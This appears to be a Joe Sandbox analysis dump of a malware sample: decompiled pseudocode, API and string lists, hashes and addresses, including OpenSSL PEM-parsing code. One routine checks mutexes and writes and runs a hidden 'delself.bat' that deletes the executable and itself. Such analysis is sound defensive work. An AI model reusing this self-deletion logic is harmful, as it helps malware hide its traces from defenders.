                                                                                    						return _t104;
                                                                                    					}
                                                                                    				} else {
                                                                                    					 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
                                                                                    					_t106 = GetLastError();
                                                                                    					_push( *0x513238);
                                                                                    					if(_t106 != 0xb7) {
                                                                                    						CloseHandle();
                                                                                    						 *0x513238 = 0;
                                                                                    						L7:
                                                                                    						if(E00412360() == 0) {
                                                                                    							GetModuleFileNameA(0,  &_v628, 0x104);
                                                                                    							GetShortPathNameA( &_v628,  &_v628, 0x104);
                                                                                    							_t48 = GetEnvironmentVariableA("TEMP",  &_v1932, 0x104);
                                                                                    							asm("sbb eax, eax");
                                                                                    							lstrcpyA( &_v364, _t48 &  &_v1932);
                                                                                    							lstrcatA( &_v364, "\\");
                                                                                    							lstrcatA( &_v364, "delself.bat");
                                                                                    							lstrcpyA( &_v1668, "@echo off\r\n:try\r\ndel \"");
                                                                                    							lstrcatA( &_v1668,  &_v628);
                                                                                    							lstrcatA( &_v1668, "\"\r\nif exist \"");
                                                                                    							lstrcatA( &_v1668,  &_v628);
                                                                                    							lstrcatA( &_v1668, "\" goto try\r\n");
                                                                                    							lstrcatA( &_v1668, "del \"");
                                                                                    							lstrcatA( &_v1668,  &_v364);
                                                                                    							lstrcatA( &_v1668, "\"");
                                                                                    							if(PathFileExistsA( &_v364) != 0) {
                                                                                    								DeleteFileA( &_v364);
                                                                                    							}
                                                                                    							_t78 = CreateFileA( &_v364, 0xc0000000, 3, 0, 2, 0x80, 0);
                                                                                    							_t113 =  &_v1668;
                                                                                    							_t110 = _t78;
                                                                                    							_t115 = _t113 + 1;
                                                                                    							do {
                                                                                    								_t79 =  *_t113;
                                                                                    								_t113 = _t113 + 1;
                                                                                    							} while (_t79 != 0);
                                                                                    							WriteFile(_t110,  &_v1668, _t113 - _t115,  &_v8, 0);
                                                                                    							FlushFileBuffers(_t110);
                                                                                    							CloseHandle(_t110);
                                                                                    							E0042B420( &_v100, 0, 0x44);
                                                                                    							_v100.cb = 0x44;
                                                                                    							_v100.dwFlags = 1;
                                                                                    							_v100.wShowWindow = 0;
                                                                                    							SetLastError(0);
                                                                                    							lstrcpyA( &_v2956, "\"");
                                                                                    							lstrcatA( &_v2956,  &_v364);
                                                                                    							lstrcatA( &_v2956, "\"");
                                                                                    							CreateProcessA(0,  &_v2956, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24);
                                                                                    							CloseHandle(_v24.hThread);
                                                                                    							return CloseHandle(_v24);
                                                                                    						} else {
                                                                                    							return E00412440();
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t108 = CloseHandle();
                                                                                    						 *0x513238 = 0;
                                                                                    						return _t108;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                    • GetLastError.KERNEL32 ref: 00412509
                                                                                    • CloseHandle.KERNEL32 ref: 0041251C
                                                                                    • CloseHandle.KERNEL32 ref: 00412539
                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                    • GetLastError.KERNEL32 ref: 0041255B
                                                                                    • CloseHandle.KERNEL32 ref: 0041256E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CreateErrorLastMutex
                                                                                    • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                    • API String ID: 2372642624-488272950
                                                                                    • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                    • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                    • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                    • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 56%
                                                                                    			E004635B0(void* __ebx, intOrPtr* __edx, void* __ebp, char _a4, char _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28, char _a32, char _a36, char _a132, char _a137, char _a141, char _a143, char _a386, signed int _a388, intOrPtr _a396, intOrPtr* _a400, intOrPtr* _a404, intOrPtr* _a408, intOrPtr* _a412) {
                                                                                    				intOrPtr _v0;
                                                                                    				intOrPtr _v4;
                                                                                    				intOrPtr _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t125;
                                                                                    				void* _t141;
                                                                                    				void* _t146;
                                                                                    				void* _t151;
                                                                                    				void* _t157;
                                                                                    				intOrPtr _t159;
                                                                                    				void* _t162;
                                                                                    				intOrPtr _t164;
                                                                                    				intOrPtr _t168;
                                                                                    				intOrPtr _t169;
                                                                                    				intOrPtr _t173;
                                                                                    				intOrPtr _t176;
                                                                                    				intOrPtr _t178;
                                                                                    				intOrPtr _t180;
                                                                                    				intOrPtr _t183;
                                                                                    				char _t186;
                                                                                    				intOrPtr _t188;
                                                                                    				intOrPtr _t193;
                                                                                    				intOrPtr _t206;
                                                                                    				intOrPtr _t210;
                                                                                    				intOrPtr _t218;
                                                                                    				void* _t219;
                                                                                    				intOrPtr _t222;
                                                                                    				intOrPtr _t224;
                                                                                    				char _t236;
                                                                                    				void* _t237;
                                                                                    				void* _t240;
                                                                                    				void* _t241;
                                                                                    				intOrPtr _t244;
                                                                                    				intOrPtr _t251;
                                                                                    				void* _t252;
                                                                                    				intOrPtr _t253;
                                                                                    				intOrPtr _t257;
                                                                                    				void* _t258;
                                                                                    				intOrPtr* _t261;
                                                                                    				intOrPtr _t262;
                                                                                    				intOrPtr _t263;
                                                                                    				intOrPtr _t264;
                                                                                    				intOrPtr* _t265;
                                                                                    				void* _t266;
                                                                                    				intOrPtr _t267;
                                                                                    				intOrPtr _t269;
                                                                                    				signed int _t271;
                                                                                    				signed int _t272;
                                                                                    				void* _t274;
                                                                                    				void* _t275;
                                                                                    				void* _t279;
                                                                                    				void* _t280;
                                                                                    				void* _t284;
                                                                                    
                                                                                    				_t247 = __edx;
                                                                                    				E0042F7C0(0x188);
                                                                                    				_t125 =  *0x50ad20; // 0x84f4da2
                                                                                    				_a388 = _t125 ^ _t271;
                                                                                    				_push(__ebx);
                                                                                    				_a16 = _a400;
                                                                                    				_push(__ebp);
                                                                                    				_a28 = _a404;
                                                                                    				_t251 = _a396;
                                                                                    				_a20 = _a408;
                                                                                    				_a12 = _t251;
                                                                                    				_a24 = _a412;
                                                                                    				_a4 = 0;
                                                                                    				_t236 = E0045AF30(__ebx, __edx, _t251);
                                                                                    				_a8 = _t236;
                                                                                    				_t257 = E0045AF30(_t236, __edx, _t251);
                                                                                    				_v0 = _t257;
                                                                                    				_t269 = E0045AF30(_t236, __edx, _t251);
                                                                                    				if(_t236 == 0 || _t257 == 0 || _t269 == 0) {
                                                                                    					E0045AD10(_t236);
                                                                                    					E0045AD10(_t257);
                                                                                    					E0045AD10(_t269);
                                                                                    					E004512D0(_t236, _t247, _t251, _t269, __eflags, 9, 0x6d, 0x41, ".\\crypto\\pem\\pem_lib.c", 0x2b4);
                                                                                    					_t272 = _t271 + 0x20;
                                                                                    					goto L72;
                                                                                    				} else {
                                                                                    					_a386 = 0;
                                                                                    					_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
                                                                                    					_t274 = _t271 + 0xc;
                                                                                    					_t284 = _t141;
                                                                                    					if(_t284 <= 0) {
                                                                                    						L14:
                                                                                    						_push(0x2bf);
                                                                                    						_push(".\\crypto\\pem\\pem_lib.c");
                                                                                    						_push(0x6c);
                                                                                    						goto L15;
                                                                                    					} else {
                                                                                    						do {
                                                                                    							if(_t284 >= 0) {
                                                                                    								while( *((char*)(_t274 + _t141 + 0x94)) <= 0x20) {
                                                                                    									_t141 = _t141 - 1;
                                                                                    									if(_t141 >= 0) {
                                                                                    										continue;
                                                                                    									}
                                                                                    									goto L8;
                                                                                    								}
                                                                                    							}
                                                                                    							L8:
                                                                                    							 *((char*)(_t274 + _t141 + 0x95)) = 0xa;
                                                                                    							_t146 = _t141 + 2;
                                                                                    							if(_t146 >= 0x100) {
                                                                                    								L74:
                                                                                    								E0042AC83();
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								_push(_t251);
                                                                                    								_t253 = E0044F960(_t236, _t247, E004656B0());
                                                                                    								__eflags = _t253;
                                                                                    								if(__eflags != 0) {
                                                                                    									_push(_t257);
                                                                                    									E0044F3E0(_t253, _t269, _t253, 0x6a, 0, _v12);
                                                                                    									_push(_a4);
                                                                                    									_push(_v0);
                                                                                    									_push(_v4);
                                                                                    									_push(_v8);
                                                                                    									_push(_t253);
                                                                                    									_t151 = E00463C30(_t247, _t269);
                                                                                    									E0044F5E0(_t253);
                                                                                    									return _t151;
                                                                                    								} else {
                                                                                    									E004512D0(_t236, _t247, _t253, _t269, __eflags, 9, 0x71, 7, ".\\crypto\\pem\\pem_lib.c", 0x248);
                                                                                    									__eflags = 0;
                                                                                    									return 0;
                                                                                    								}
                                                                                    							} else {
                                                                                    								 *((char*)(_t274 + _t146 + 0x98)) = 0;
                                                                                    								_t157 = E00448190( &_a132, "-----BEGIN ", 0xb);
                                                                                    								_t279 = _t274 + 0xc;
                                                                                    								if(_t157 != 0) {
                                                                                    									goto L13;
                                                                                    								} else {
                                                                                    									_t261 =  &_a143;
                                                                                    									_t240 = _t261 + 1;
                                                                                    									do {
                                                                                    										_t159 =  *_t261;
                                                                                    										_t261 = _t261 + 1;
                                                                                    									} while (_t159 != 0);
                                                                                    									_t257 = _t261 - _t240;
                                                                                    									_t162 = E00448190( &_a137 + _t257, "-----\n", 6);
                                                                                    									_t279 = _t279 + 0xc;
                                                                                    									if(_t162 == 0) {
                                                                                    										_t164 = E0045AD50(_t236, _t247, _t269, _t236, _t257 + 9);
                                                                                    										_t274 = _t279 + 8;
                                                                                    										__eflags = _t164;
                                                                                    										if(__eflags != 0) {
                                                                                    											E0042D8D0( *((intOrPtr*)(_t236 + 4)),  &_a143, _t257 - 6);
                                                                                    											_t168 =  *((intOrPtr*)(_t236 + 4));
                                                                                    											_t236 = 0;
                                                                                    											 *((char*)(_t168 + _t257 - 6)) = 0;
                                                                                    											_t262 = _v0;
                                                                                    											_t169 = E0045AD50(0, _t247, _t269, _t262, 0x100);
                                                                                    											_t274 = _t274 + 0x14;
                                                                                    											__eflags = _t169;
                                                                                    											if(__eflags != 0) {
                                                                                    												 *((char*)( *((intOrPtr*)(_t262 + 4)))) = 0;
                                                                                    												_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
                                                                                    												_t274 = _t274 + 0xc;
                                                                                    												__eflags = _t263;
                                                                                    												if(__eflags <= 0) {
                                                                                    													L32:
                                                                                    													_t264 = 0;
                                                                                    													__eflags = 0;
                                                                                    													goto L33;
                                                                                    												} else {
                                                                                    													do {
                                                                                    														if(__eflags >= 0) {
                                                                                    															while(1) {
                                                                                    																__eflags =  *((char*)(_t274 + _t263 + 0x94)) - 0x20;
                                                                                    																if( *((char*)(_t274 + _t263 + 0x94)) > 0x20) {
                                                                                    																	goto L27;
                                                                                    																}
                                                                                    																_t263 = _t263 - 1;
                                                                                    																__eflags = _t263;
                                                                                    																if(_t263 >= 0) {
                                                                                    																	continue;
                                                                                    																}
                                                                                    																goto L27;
                                                                                    															}
                                                                                    														}
                                                                                    														L27:
                                                                                    														 *((char*)(_t274 + _t263 + 0x95)) = 0xa;
                                                                                    														_t257 = _t263 + 2;
                                                                                    														__eflags = _t257 - 0x100;
                                                                                    														if(_t257 >= 0x100) {
                                                                                    															goto L74;
                                                                                    														} else {
                                                                                    															 *((char*)(_t274 + _t257 + 0x94)) = 0;
                                                                                    															__eflags = _a132 - 0xa;
                                                                                    															if(_a132 == 0xa) {
                                                                                    																goto L32;
                                                                                    															} else {
                                                                                    																_t251 = _t257 + _t236;
                                                                                    																_t222 = E0045AD50(_t236, _t247, _t269, _v0, _t251 + 9);
                                                                                    																_t274 = _t274 + 8;
                                                                                    																__eflags = _t222;
                                                                                    																if(__eflags == 0) {
                                                                                    																	_push(0x2e4);
                                                                                    																	goto L22;
                                                                                    																} else {
                                                                                    																	_t224 = E00448190( &_a132, "-----END ", 9);
                                                                                    																	_t274 = _t274 + 0xc;
                                                                                    																	__eflags = _t224;
                                                                                    																	if(_t224 == 0) {
                                                                                    																		_t251 = _a12;
                                                                                    																		_t264 = 1;
                                                                                    																		L33:
                                                                                    																		_a4 = 0;
                                                                                    																		_t173 = E0045AD50(_t236, _t247, _t269, _t269, 0x400);
                                                                                    																		_t274 = _t274 + 8;
                                                                                    																		__eflags = _t173;
                                                                                    																		if(__eflags != 0) {
                                                                                    																			 *_a4 = 0;
                                                                                    																			__eflags = _t264;
                                                                                    																			if(_t264 != 0) {
                                                                                    																				_t251 = _t269;
                                                                                    																				_v0 = _t251;
                                                                                    																				_t269 = _v0;
                                                                                    																				_a4 = _t236;
                                                                                    																				goto L51;
                                                                                    																			} else {
                                                                                    																				_t267 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
                                                                                    																				_t274 = _t274 + 0xc;
                                                                                    																				__eflags = _t267;
                                                                                    																				if(_t267 <= 0) {
                                                                                    																					L50:
                                                                                    																					_t251 = _v0;
                                                                                    																					L51:
                                                                                    																					_t236 = _a8;
                                                                                    																					_t265 =  *((intOrPtr*)(_t236 + 4));
                                                                                    																					_t83 = _t265 + 1; // 0x9
                                                                                    																					_t241 = _t83;
                                                                                    																					do {
                                                                                    																						_t176 =  *_t265;
                                                                                    																						_t265 = _t265 + 1;
                                                                                    																						__eflags = _t176;
                                                                                    																					} while (_t176 != 0);
                                                                                    																					_t266 = _t265 - _t241;
                                                                                    																					_t178 = E00448190( &_a132, "-----END ", 9);
                                                                                    																					_t274 = _t274 + 0xc;
                                                                                    																					__eflags = _t178;
                                                                                    																					if(__eflags != 0) {
                                                                                    																						L70:
                                                                                    																						_push(0x322);
                                                                                    																						_push(".\\crypto\\pem\\pem_lib.c");
                                                                                    																						_push(0x66);
                                                                                    																						goto L15;
                                                                                    																					} else {
                                                                                    																						_t180 = E00448190( *((intOrPtr*)(_t236 + 4)),  &_a141, _t266);
                                                                                    																						_t274 = _t274 + 0xc;
                                                                                    																						__eflags = _t180;
                                                                                    																						if(__eflags != 0) {
                                                                                    																							goto L70;
                                                                                    																						} else {
                                                                                    																							_t183 = E00448190( &_a141 + _t266, "-----\n", 6);
                                                                                    																							_t274 = _t274 + 0xc;
                                                                                    																							__eflags = _t183;
                                                                                    																							if(__eflags != 0) {
                                                                                    																								goto L70;
                                                                                    																							} else {
                                                                                    																								E0047E5B0( &_a36);
                                                                                    																								_push(_a4);
                                                                                    																								_t186 = _a4;
                                                                                    																								_push(_t186);
                                                                                    																								_push( &_a4);
                                                                                    																								_push(_t186);
                                                                                    																								_push( &_a36);
                                                                                    																								_t188 = E0047E5D0();
                                                                                    																								_t274 = _t274 + 0x18;
                                                                                    																								__eflags = _t188;
                                                                                    																								if(__eflags >= 0) {
                                                                                    																									_t193 = E0047E560( &_a36, _a4 + _a4,  &_a32);
                                                                                    																									_t275 = _t274 + 0xc;
                                                                                    																									__eflags = _t193;
                                                                                    																									if(__eflags >= 0) {
                                                                                    																										_t244 = _a4 + _a32;
                                                                                    																										__eflags = _t244;
                                                                                    																										_a4 = _t244;
                                                                                    																										if(_t244 == 0) {
                                                                                    																											goto L17;
                                                                                    																										} else {
                                                                                    																											 *_a16 =  *((intOrPtr*)(_t236 + 4));
                                                                                    																											 *_a28 =  *((intOrPtr*)(_t251 + 4));
                                                                                    																											_t247 = _a20;
                                                                                    																											 *_a20 = _a4;
                                                                                    																											 *_a24 = _t244;
                                                                                    																											E00454C70(_t236);
                                                                                    																											E00454C70(_t251);
                                                                                    																											E00454C70(_t269);
                                                                                    																											_t272 = _t275 + 0xc;
                                                                                    																										}
                                                                                    																									} else {
                                                                                    																										_push(0x332);
                                                                                    																										_push(".\\crypto\\pem\\pem_lib.c");
                                                                                    																										_push(0x64);
                                                                                    																										goto L15;
                                                                                    																									}
                                                                                    																								} else {
                                                                                    																									_push(0x32c);
                                                                                    																									_push(".\\crypto\\pem\\pem_lib.c");
                                                                                    																									_push(0x64);
                                                                                    																									goto L15;
                                                                                    																								}
                                                                                    																							}
                                                                                    																						}
                                                                                    																					}
                                                                                    																					goto L73;
                                                                                    																				} else {
                                                                                    																					_t236 = 0;
                                                                                    																					__eflags = _t267;
                                                                                    																					do {
                                                                                    																						if(__eflags >= 0) {
                                                                                    																							while(1) {
                                                                                    																								__eflags =  *((char*)(_t274 + _t267 + 0x94)) - 0x20;
                                                                                    																								if( *((char*)(_t274 + _t267 + 0x94)) > 0x20) {
                                                                                    																									goto L44;
                                                                                    																								}
                                                                                    																								_t267 = _t267 - 1;
                                                                                    																								__eflags = _t267;
                                                                                    																								if(_t267 >= 0) {
                                                                                    																									continue;
                                                                                    																								}
                                                                                    																								goto L44;
                                                                                    																							}
                                                                                    																						}
                                                                                    																						L44:
                                                                                    																						 *((char*)(_t274 + _t267 + 0x95)) = 0xa;
                                                                                    																						_t257 = _t267 + 2;
                                                                                    																						__eflags = _t257 - 0x100;
                                                                                    																						if(_t257 >= 0x100) {
                                                                                    																							goto L74;
                                                                                    																						} else {
                                                                                    																							__eflags = _t257 - 0x41;
                                                                                    																							 *((char*)(_t274 + _t257 + 0x94)) = 0;
                                                                                    																							_t236 = (_t257 != 0x41) ? 1 : _t236; // condition recovered from the preceding flag computation (_t257 - 0x41)
                                                                                    																							_t206 = E00448190( &_a132, "-----END ", 9);
                                                                                    																							_t274 = _t274 + 0xc;
                                                                                    																							__eflags = _t206;
                                                                                    																							if(_t206 == 0) {
                                                                                    																								goto L50;
                                                                                    																							} else {
                                                                                    																								__eflags = _t257 - 0x41;
                                                                                    																								if(_t257 > 0x41) {
                                                                                    																									goto L50;
                                                                                    																								} else {
                                                                                    																									_t210 = E0045AE30(_t236, _t247, _t269, _t269, _a4 + 9 + _t257);
                                                                                    																									_t274 = _t274 + 8;
                                                                                    																									__eflags = _t210;
                                                                                    																									if(__eflags == 0) {
                                                                                    																										_push(0x303);
                                                                                    																										goto L22;
                                                                                    																									} else {
                                                                                    																										E0042D8D0(_a4 + _a4,  &_a132, _t257);
                                                                                    																										_t280 = _t274 + 0xc;
                                                                                    																										_push(0xfe);
                                                                                    																										 *((char*)(_a4 + _t257 + _a4)) = 0;
                                                                                    																										_a4 = _a4 + _t257;
                                                                                    																										_push( &_a132);
                                                                                    																										_push(_t251);
                                                                                    																										__eflags = _t236;
                                                                                    																										if(_t236 != 0) {
                                                                                    																											_a132 = 0;
                                                                                    																											_t218 = E0044F780(_t251, _t269);
                                                                                    																											_t274 = _t280 + 0xc;
                                                                                    																											__eflags = _t218;
                                                                                    																											if(_t218 <= 0) {
                                                                                    																												goto L50;
                                                                                    																											} else {
                                                                                    																												while(1) {
                                                                                    																													__eflags =  *((char*)(_t274 + _t218 + 0x94)) - 0x20;
                                                                                    																													if( *((char*)(_t274 + _t218 + 0x94)) > 0x20) {
                                                                                    																														break;
                                                                                    																													}
                                                                                    																													_t218 = _t218 - 1;
                                                                                    																													__eflags = _t218;
                                                                                    																													if(_t218 >= 0) {
                                                                                    																														continue;
                                                                                    																													}
                                                                                    																													break;
                                                                                    																												}
                                                                                    																												 *((char*)(_t274 + _t218 + 0x95)) = 0xa;
                                                                                    																												_t219 = _t218 + 2;
                                                                                    																												__eflags = _t219 - 0x100;
                                                                                    																												if(_t219 >= 0x100) {
                                                                                    																													goto L74;
                                                                                    																												} else {
                                                                                    																													 *((char*)(_t274 + _t219 + 0x94)) = 0;
                                                                                    																													goto L50;
                                                                                    																												}
                                                                                    																											}
                                                                                    																										} else {
                                                                                    																											goto L49;
                                                                                    																										}
                                                                                    																									}
                                                                                    																								}
                                                                                    																							}
                                                                                    																						}
                                                                                    																						goto L77;
                                                                                    																						L49:
                                                                                    																						_t267 = E0044F780(_t251, _t269);
                                                                                    																						_t274 = _t280 + 0xc;
                                                                                    																						__eflags = _t267;
                                                                                    																					} while (__eflags > 0);
                                                                                    																					goto L50;
                                                                                    																				}
                                                                                    																			}
                                                                                    																		} else {
                                                                                    																			_push(0x2f1);
                                                                                    																			goto L22;
                                                                                    																		}
                                                                                    																	} else {
                                                                                    																		goto L31;
                                                                                    																	}
                                                                                    																}
                                                                                    															}
                                                                                    														}
                                                                                    														goto L77;
                                                                                    														L31:
                                                                                    														E0042D8D0( *((intOrPtr*)(_v0 + 4)) + _t236,  &_a132, _t257);
                                                                                    														 *((char*)( *((intOrPtr*)(_v0 + 4)) + _t257 + _t236)) = 0;
                                                                                    														_t236 = _t251;
                                                                                    														_t251 = _a12;
                                                                                    														_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
                                                                                    														_t274 = _t274 + 0x18;
                                                                                    														__eflags = _t263;
                                                                                    													} while (__eflags > 0);
                                                                                    													goto L32;
                                                                                    												}
                                                                                    											} else {
                                                                                    												_push(0x2d8);
                                                                                    												L22:
                                                                                    												_push(".\\crypto\\pem\\pem_lib.c");
                                                                                    												_push(0x41);
                                                                                    												_push(0x6d);
                                                                                    												_push(9);
                                                                                    												E004512D0(_t236, _t247, _t251, _t269, __eflags);
                                                                                    												_t236 = _a8;
                                                                                    												goto L16;
                                                                                    											}
                                                                                    										} else {
                                                                                    											_push(0x2ce);
                                                                                    											_push(".\\crypto\\pem\\pem_lib.c");
                                                                                    											_push(0x41);
                                                                                    											L15:
                                                                                    											_push(0x6d);
                                                                                    											_push(9);
                                                                                    											E004512D0(_t236, _t247, _t251, _t269, _t291);
                                                                                    											L16:
                                                                                    											_t275 = _t274 + 0x14;
                                                                                    											L17:
                                                                                    											E0045AD10(_t236);
                                                                                    											E0045AD10(_v0);
                                                                                    											E0045AD10(_t269);
                                                                                    											_t272 = _t275 + 0xc;
                                                                                    											L72:
                                                                                    											L73:
                                                                                    											_pop(_t252);
                                                                                    											_pop(_t258);
                                                                                    											_pop(_t237);
                                                                                    											return E0042A77E(_t237, _a388 ^ _t272, _t247, _t252, _t258);
                                                                                    										}
                                                                                    									} else {
                                                                                    										goto L13;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							goto L77;
                                                                                    							L13:
                                                                                    							_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
                                                                                    							_t274 = _t279 + 0xc;
                                                                                    							_t291 = _t141;
                                                                                    						} while (_t141 > 0);
                                                                                    						goto L14;
                                                                                    					}
                                                                                    				}
                                                                                    				L77:
                                                                                    			}

                                                                                    0x004639aa
                                                                                    0x004639ac
                                                                                    0x00463a75
                                                                                    0x00463a7d
                                                                                    0x00463a82
                                                                                    0x00463a85
                                                                                    0x00463a87
                                                                                    0x00000000
                                                                                    0x00463a90
                                                                                    0x00463a90
                                                                                    0x00463a90
                                                                                    0x00463a98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00463a9a
                                                                                    0x00463a9a
                                                                                    0x00463a9b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00463a9b
                                                                                    0x00463a9d
                                                                                    0x00463aa5
                                                                                    0x00463aa8
                                                                                    0x00463aad
                                                                                    0x00000000
                                                                                    0x00463ab3
                                                                                    0x00463ab3
                                                                                    0x00000000
                                                                                    0x00463ab3
                                                                                    0x00463aad
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004639ac
                                                                                    0x0046396c
                                                                                    0x00463955
                                                                                    0x00463950
                                                                                    0x00000000
                                                                                    0x004639b2
                                                                                    0x004639b7
                                                                                    0x004639b9
                                                                                    0x004639bc
                                                                                    0x004639bc
                                                                                    0x00000000
                                                                                    0x004638f9
                                                                                    0x004638ef
                                                                                    0x004638a8
                                                                                    0x004638a8
                                                                                    0x00000000
                                                                                    0x004638a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0046383f
                                                                                    0x00463820
                                                                                    0x00463805
                                                                                    0x00000000
                                                                                    0x00463841
                                                                                    0x00463854
                                                                                    0x00463867
                                                                                    0x00463873
                                                                                    0x00463875
                                                                                    0x0046387f
                                                                                    0x00463881
                                                                                    0x00463884
                                                                                    0x00463884
                                                                                    0x00000000
                                                                                    0x004637cf
                                                                                    0x0046378c
                                                                                    0x0046378c
                                                                                    0x00463791
                                                                                    0x00463791
                                                                                    0x00463796
                                                                                    0x00463798
                                                                                    0x0046379a
                                                                                    0x0046379c
                                                                                    0x004637a1
                                                                                    0x00000000
                                                                                    0x004637a1
                                                                                    0x0046374a
                                                                                    0x0046374a
                                                                                    0x0046374f
                                                                                    0x00463754
                                                                                    0x00463710
                                                                                    0x00463710
                                                                                    0x00463712
                                                                                    0x00463714
                                                                                    0x00463719
                                                                                    0x00463719
                                                                                    0x0046371c
                                                                                    0x0046371d
                                                                                    0x00463726
                                                                                    0x0046372c
                                                                                    0x00463731
                                                                                    0x00463b98
                                                                                    0x00463b9a
                                                                                    0x00463ba1
                                                                                    0x00463ba2
                                                                                    0x00463ba4
                                                                                    0x00463bb2
                                                                                    0x00463bb2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004636e4
                                                                                    0x004636b4
                                                                                    0x00000000
                                                                                    0x004636e6
                                                                                    0x004636f4
                                                                                    0x004636f9
                                                                                    0x004636fc
                                                                                    0x004636fc
                                                                                    0x00000000
                                                                                    0x00463666
                                                                                    0x00463660
                                                                                    0x00000000

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strncmp
                                                                                    • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                    • API String ID: 909875538-2733969777
                                                                                    • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                    • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                    • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                    • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E00425A97(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				intOrPtr _t12;
                                                                                    				intOrPtr _t13;
                                                                                    				intOrPtr _t15;
                                                                                    				intOrPtr _t22;
                                                                                    				intOrPtr* _t42;
                                                                                    
                                                                                    				if(_a4 > 5 || _a8 == 0) {
                                                                                    					L4:
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					_t42 = E00428C96(8, 1);
                                                                                    					_t48 = _t42;
                                                                                    					if(_t42 != 0) {
                                                                                    						_t12 = E00428C96(0xb8, 1);
                                                                                    						 *_t42 = _t12;
                                                                                    						__eflags = _t12;
                                                                                    						if(_t12 != 0) {
                                                                                    							_t13 = E00428C96(0x220, 1);
                                                                                    							 *((intOrPtr*)(_t42 + 4)) = _t13;
                                                                                    							__eflags = _t13;
                                                                                    							if(_t13 != 0) {
                                                                                    								E004255AC( *_t42, 0x50aae8);
                                                                                    								_t15 = E00425E97(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
                                                                                    								_push( *((intOrPtr*)(_t42 + 4)));
                                                                                    								__eflags = _t15;
                                                                                    								if(__eflags == 0) {
                                                                                    									L14:
                                                                                    									E00420BED();
                                                                                    									E0042453C( *_t42);
                                                                                    									E004243E2( *_t42);
                                                                                    									E00420BED(_t42);
                                                                                    									_t42 = 0;
                                                                                    									L16:
                                                                                    									return _t42;
                                                                                    								}
                                                                                    								_push( *((intOrPtr*)( *_t42 + 4)));
                                                                                    								_t22 = E00424BDD(__edx, 1, __eflags);
                                                                                    								__eflags = _t22;
                                                                                    								if(_t22 == 0) {
